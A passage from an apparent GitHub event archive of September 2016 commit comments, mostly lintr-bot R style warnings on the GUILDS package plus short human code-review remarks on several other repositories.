evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n ^~~~~~~~~~\n```\n[R/Condition.R:58:14:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L58) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n             ^\n```\n[R/Condition.R:58:16:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L58) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:58:16:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L58) *warning:* **no visible global function definition for ‘evaluateCondLik’**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:58:36:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L58) *style:* **Commas should always have a space after.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                   ^\n```\n[R/Condition.R:58:44:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L58) *style:* **Commas should always have a space after.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                           ^\n```\n[R/Condition.R:58:52:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L58) *style:* **Commas should always have a space after.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                   ^\n```\n[R/Condition.R:58:60:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L58) *style:* **Commas should always have a space after.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                           ^\n```\n[R/Condition.R:58:68:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L58) *style:* **Commas should always have a space after.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                                   ^\n```\n[R/Condition.R:58:71:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L58) *style:* **Commas should always have a space after.**\n```r\n​ checkLeftX  = evaluateCondLik(eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                                      ^\n```\n[R/Condition.R:59:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L59) *style:* **lines should not be more than 80 characters.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:59:2:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L59) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n ^~~~~~~~~~~\n```\n[R/Condition.R:59:14:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L59) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n             ^\n```\n[R/Condition.R:59:16:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L59) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:59:16:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L59) *warning:* **no visible global function definition for ‘evaluateCondLik’**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:59:33:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                               ~^~\n```\n[R/Condition.R:59:38:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L59) *style:* **Commas should always have a space after.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                     ^\n```\n[R/Condition.R:59:46:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L59) *style:* **Commas should always have a space after.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                             ^\n```\n[R/Condition.R:59:54:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L59) *style:* **Commas should always have a space after.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                     ^\n```\n[R/Condition.R:59:62:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L59) *style:* **Commas should always have a space after.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                             ^\n```\n[R/Condition.R:59:70:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L59) *style:* **Commas should always have a space after.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                                     ^\n```\n[R/Condition.R:59:73:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L59) *style:* **Commas should always have a space after.**\n```r\n​ checkRightX = evaluateCondLik(1-eps,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)  - ymax + thrs;\n                                                                        ^\n```\n[R/Condition.R:62:4:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L62) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkLeftX < 0) {\n   ^\n```\n[R/Condition.R:62:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L62) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkLeftX < 0) {\n    ^~~~~~~~~~\n```\n[R/Condition.R:64:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L64) *style:* **lines should not be more than 80 characters.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:64:16:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L64) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:64:16:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L64) *warning:* **no visible global function definition for ‘evaluateCondLik’**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:64:34:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L64) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                 ^\n```\n[R/Condition.R:64:42:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L64) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                         ^\n```\n[R/Condition.R:64:50:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L64) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                                 ^\n```\n[R/Condition.R:64:58:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L64) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                                         ^\n```\n[R/Condition.R:64:66:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L64) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                                                 ^\n```\n[R/Condition.R:64:69:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L64) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                                                    ^\n```\n[R/Condition.R:66:25:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L66) *style:* **Commas should always have a space after.**\n```r\n​     xlft <- (uniroot(g,c(eps,xmax)))$root;\n                        ^\n```\n[R/Condition.R:66:31:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L66) *style:* **Commas should always have a space after.**\n```r\n​     xlft <- (uniroot(g,c(eps,xmax)))$root;\n                              ^\n```\n[R/Condition.R:69:4:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkRightX < 0) {\n   ^\n```\n[R/Condition.R:69:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L69) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkRightX < 0) {\n    ^~~~~~~~~~~\n```\n[R/Condition.R:71:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L71) *style:* **lines should not be more than 80 characters.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:71:16:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:71:16:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L71) *warning:* **no visible global function definition for ‘evaluateCondLik’**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:71:34:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L71) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                 ^\n```\n[R/Condition.R:71:42:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L71) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                         ^\n```\n[R/Condition.R:71:50:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L71) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                                 ^\n```\n[R/Condition.R:71:58:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L71) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                                         ^\n```\n[R/Condition.R:71:66:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L71) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                                                 ^\n```\n[R/Condition.R:71:69:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L71) *style:* **Commas should always have a space after.**\n```r\n​        return(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) - ymax + thrs);\n                                                                    ^\n```\n[R/Condition.R:73:25:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L73) *style:* **Commas should always have a space after.**\n```r\n​     xrgt <- (uniroot(h,c(xmax,1-eps)))$root;\n                        ^\n```\n[R/Condition.R:73:32:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L73) *style:* **Commas should always have a space after.**\n```r\n​     xrgt <- (uniroot(h,c(xmax,1-eps)))$root;\n                               ^\n```\n[R/Condition.R:73:33:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​     xrgt <- (uniroot(h,c(xmax,1-eps)))$root;\n                               ~^~\n```\n[R/Condition.R:76:2:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L76) *style:* **Variable and function names should be all lowercase.**\n```r\n​ calcLLEXP <- function(x) {\n ^~~~~~~~~\n```\n[R/Condition.R:77:15:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax);\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:77:15:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L77) *warning:* **no visible global function definition for ‘evaluateCondLik’**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax);\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:77:33:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L77) *style:* **Commas should always have a space after.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax);\n                                ^\n```\n[R/Condition.R:77:41:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L77) *style:* **Commas should always have a space after.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax);\n                                        ^\n```\n[R/Condition.R:77:49:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L77) *style:* **Commas should always have a space after.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax);\n                                                ^\n```\n[R/Condition.R:77:57:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L77) *style:* **Commas should always have a space after.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax);\n                                                        ^\n```\n[R/Condition.R:77:65:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L77) *style:* **Commas should always have a space after.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax);\n                                                                ^\n```\n[R/Condition.R:77:68:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L77) *style:* **Commas should always have a space after.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax);\n                                                                   ^\n```\n[R/Condition.R:77:71:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​   out <- exp(evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny)-ymax);\n                                                                     ~^~\n```\n[R/Condition.R:81:21:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​  aux <- integrate(f=calcLLEXP,lower=xlft,upper=xrgt,abs.tol=1e-9);\n"}},"created_at":"2016-09-21T18:11:46Z"}
{"id":"4597975947","type":"CommitCommentEvent","actor":{"login":"ODiogoSilva"},"repo":{"name":"StuntsPT/Structure_threader"},"payload":{"comment":{"id":19118106,"position":null,"line":null,"path":null,"commit_id":"f8a2cd82a5590a7dec2249b987b0e06b242f4797","created_at":"2016-09-21T18:12:03Z","updated_at":"2016-09-21T18:12:03Z","body":"#12 "}},"created_at":"2016-09-21T18:12:03Z"}
{"id":"4597978487","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"seninp-bioinfo/MetaComp"},"payload":{"comment":{"id":19118114,"position":null,"line":null,"path":null,"commit_id":"d0e4deb31bae262309dfd800a4f6e5ef0365f32c","created_at":"2016-09-21T18:12:30Z","updated_at":"2016-09-21T18:12:30Z","body":"[R/convert_merge_table_to_phyloseq_otu_table.R:17:1:](https://github.com/seninp-bioinfo/MetaComp/blob/d0e4deb31bae262309dfd800a4f6e5ef0365f32c/R/convert_merge_table_to_phyloseq_otu_table.R#L17) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​convert_merge_table_to_phyloseq_otu_table <- function(filepath, TAXON){\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:4:8:](https://github.com/seninp-bioinfo/MetaComp/blob/d0e4deb31bae262309dfd800a4f6e5ef0365f32c/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L4) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​dat <- convert_merge_table_to_phyloseq_otu_table(\"../test_data/merged_table.tsv\", \"class\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:21:22:](https://github.com/seninp-bioinfo/MetaComp/blob/d0e4deb31bae262309dfd800a4f6e5ef0365f32c/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L21) *style:* **Commas should always have a space after.**\n```r\n​expect_that(sum(dat[,1]), equals(1.0))\n                     ^\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:26:13:](https://github.com/seninp-bioinfo/MetaComp/blob/d0e4deb31bae262309dfd800a4f6e5ef0365f32c/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L26) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​expect_that(convert_merge_table_to_phyloseq_otu_table(\"../test_data/merged_table.tsv\",\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-21T18:12:30Z"}
{"id":"4597980795","type":"CommitCommentEvent","actor":{"login":"cbeck"},"repo":{"name":"bpresser123/blocitoff"},"payload":{"comment":{"id":19118120,"position":1,"line":1,"path":"lib/random_data.rb","commit_id":"124d61b36d12f187588ad48bf224c3ecf63c8cc8","created_at":"2016-09-21T18:12:53Z","updated_at":"2016-09-21T18:12:53Z","body":"You can just delete this file"}},"created_at":"2016-09-21T18:12:53Z"}
{"id":"4597981043","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118121,"position":27,"line":27,"path":"app/controllers/main-controller.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:12:56Z","updated_at":"2016-09-21T18:12:56Z","body":"Можно сразу, без промежуточной переменной.\r\n`if confirm(\"Are you sure you want to delete the selected item?\") { .... }`"}},"created_at":"2016-09-21T18:12:56Z"}
{"id":"4597982758","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118124,"position":25,"line":25,"path":"app/controllers/main-controller.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:13:14Z","updated_at":"2016-09-21T18:13:14Z","body":"Что такое `x`?"}},"created_at":"2016-09-21T18:13:14Z"}
{"id":"4597985893","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118129,"position":20,"line":20,"path":"app/controllers/main-controller.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:13:47Z","updated_at":"2016-09-21T18:13:47Z","body":"Не `mainArray`, а, например, `items` или `records`"}},"created_at":"2016-09-21T18:13:47Z"}
{"id":"4597987458","type":"CommitCommentEvent","actor":{"login":"lpaznboy99"},"repo":{"name":"max-h12/scrabbleaiganggang"},"payload":{"comment":{"id":19118133,"position":2,"line":2,"path":"scrabble.java","commit_id":"918fdfd6010d9ae197adb6c7e318023d701b35ce","created_at":"2016-09-21T18:14:03Z","updated_at":"2016-09-21T18:14:03Z","body":"fuck you\r\n"}},"created_at":"2016-09-21T18:14:03Z"}
{"id":"4597987880","type":"CommitCommentEvent","actor":{"login":"Ryuno-Ki"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19118135,"position":null,"line":null,"path":null,"commit_id":"46799e7206736db0e03b7ce6f6dc9e30fadd5fd7","created_at":"2016-09-21T18:14:09Z","updated_at":"2016-09-21T18:14:09Z","body":"N * 60 * 60 should be a familiar pattern. The 3 underscores the hour.\r\n\r\nI mean, where else do you compute that product?"}},"created_at":"2016-09-21T18:14:09Z"}
{"id":"4597992425","type":"CommitCommentEvent","actor":{"login":"jacksonic"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":19118143,"position":null,"line":null,"path":null,"commit_id":"81b1a5fd003b9897ee339250d69fdd3e757eaeb6","created_at":"2016-09-21T18:14:55Z","updated_at":"2016-09-21T18:14:55Z","body":"It's not finished yet! MultiPartID makes it even more compact...\n\nOn Wed, Sep 21, 2016 at 12:51 PM Kevin Glen Roy Greer <\nnotifications@github.com> wrote:\n\n> LGTM\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/foam-framework/foam2-experimental/commit/81b1a5fd003b9897ee339250d69fdd3e757eaeb6#commitcomment-19116922>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIKjMIq-Ufkbg3FTcTe7xjaPgZhTMtrfks5qsWCmgaJpZM4KDCSv>\n> .\n>\n"}},"created_at":"2016-09-21T18:14:55Z"}
{"id":"4597993711","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118146,"position":13,"line":13,"path":"app/controllers/main-controller.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:15:10Z","updated_at":"2016-09-21T18:15:10Z","body":"`$scope.logout = AuthService.logout`"}},"created_at":"2016-09-21T18:15:10Z"}
{"id":"4597994582","type":"CommitCommentEvent","actor":{"login":"IgorAntun"},"repo":{"name":"guivr/treine-me"},"payload":{"comment":{"id":19118147,"position":null,"line":null,"path":null,"commit_id":"89697116b5b0b0baaf264a6eae3b249c55ba6c8c","created_at":"2016-09-21T18:15:19Z","updated_at":"2016-09-21T18:15:19Z","body":":top:  :ok_hand::joy: "}},"created_at":"2016-09-21T18:15:19Z"}
{"id":"4597994987","type":"CommitCommentEvent","actor":{"login":"DinkyDyeAussie"},"repo":{"name":"Wargus/wargus"},"payload":{"comment":{"id":19118148,"position":null,"line":null,"path":null,"commit_id":"ecbd913864cd4c4fd23810c274a68dd76bff4017","created_at":"2016-09-21T18:15:23Z","updated_at":"2016-09-21T18:15:23Z","body":"Just create a topin here and we can communicate that way man."}},"created_at":"2016-09-21T18:15:23Z"}
{"id":"4597995354","type":"CommitCommentEvent","actor":{"login":"cpovirk"},"repo":{"name":"google/guava"},"payload":{"comment":{"id":19118149,"position":null,"line":null,"path":null,"commit_id":"cb3a29fb67936c2bc52b1cfee08cedab62950282","created_at":"2016-09-21T18:15:27Z","updated_at":"2016-09-21T18:15:27Z","body":"It was used at https://github.com/google/guava/commit/cb3a29fb67936c2bc52b1cfee08cedab62950282#diff-c270cc564ba7c94df7c947320ea3989cL73, but we think we're just as happy with the superclass implementation."}},"created_at":"2016-09-21T18:15:27Z"}
{"id":"4597995703","type":"CommitCommentEvent","actor":{"login":"josephsavona"},"repo":{"name":"facebook/relay"},"payload":{"comment":{"id":19118150,"position":null,"line":null,"path":null,"commit_id":"ba05332044ab8e68890f63a875514211ee480908","created_at":"2016-09-21T18:15:30Z","updated_at":"2016-09-21T18:15:30Z","body":"Unfortunately, #736 doesn't seem urgent and the core team doesn't have the bandwidth to import it right now. "}},"created_at":"2016-09-21T18:15:30Z"}
{"id":"4597995731","type":"CommitCommentEvent","actor":{"login":"cbeck"},"repo":{"name":"bpresser123/blocitoff"},"payload":{"comment":{"id":19118151,"position":7,"line":6,"path":"db/seeds.rb","commit_id":"124d61b36d12f187588ad48bf224c3ecf63c8cc8","created_at":"2016-09-21T18:15:31Z","updated_at":"2016-09-21T18:15:31Z","body":"Change this to:\r\n\r\n```\r\nemail: Faker::Internet.email,\r\npassword: Faker::Internet.password\r\n```\r\n\r\nThe fields need to match what devise expects. "}},"created_at":"2016-09-21T18:15:31Z"}
